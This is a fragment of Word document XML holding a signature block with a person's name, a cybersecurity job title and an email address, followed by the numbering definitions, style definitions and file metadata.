          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Sanchit Mathur</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t>Cyber Security | CEH | SOC &amp; Pentesting</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA6C37">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t>Email: mathursanchit7@gmail.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C8666D" w14:textId="575A3AD2" w:rsidR="009572E1" w:rsidRPr="00BA6C37" w:rsidRDefault="009572E1" w:rsidP="00BA6C37"/>
    <w:sectPr w:rsidR="009572E1" w:rsidRPr="00BA6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246"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D432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1228F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F18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951E3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4AF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90AEF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3FC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341C0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="55F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D3D26"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1C0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D76D4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="061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05FAB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C60E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0F235E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="184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32561"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4BD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37D3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A2E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6EAA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="607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D5FF4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A37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0070D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5B0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C54DC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9B8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76846">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="693459052">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1460877012">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="575483806">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1571115528">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1509056597">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1277564304">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="9645242">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="416513754">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="579363225">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="173304644">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="844367170">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="919220399">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1906720735">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1974677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E1"/>
    <w:rsid w:val="00374C28"/>
    <w:rsid w:val="00636F72"/>
    <w:rsid w:val="009572E1"/>
    <w:rsid w:val="00BA6C37"/>
    <w:rsid w:val="00BE7D3B"/>
    <w:rsid w:val="00C67800"/>
    <w:rsid w:val="00CD7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10AA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8C6FDDE2-D84E-47D7-BD05-BF857031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E1"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00957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E1"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="009572E1"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="009572E1"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="009572E1"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00957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2E1"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="009572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B3271-549C-429F-AC14-E517EA172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mathur</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>sanchit mathur</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-12-21T07:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-21T08:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>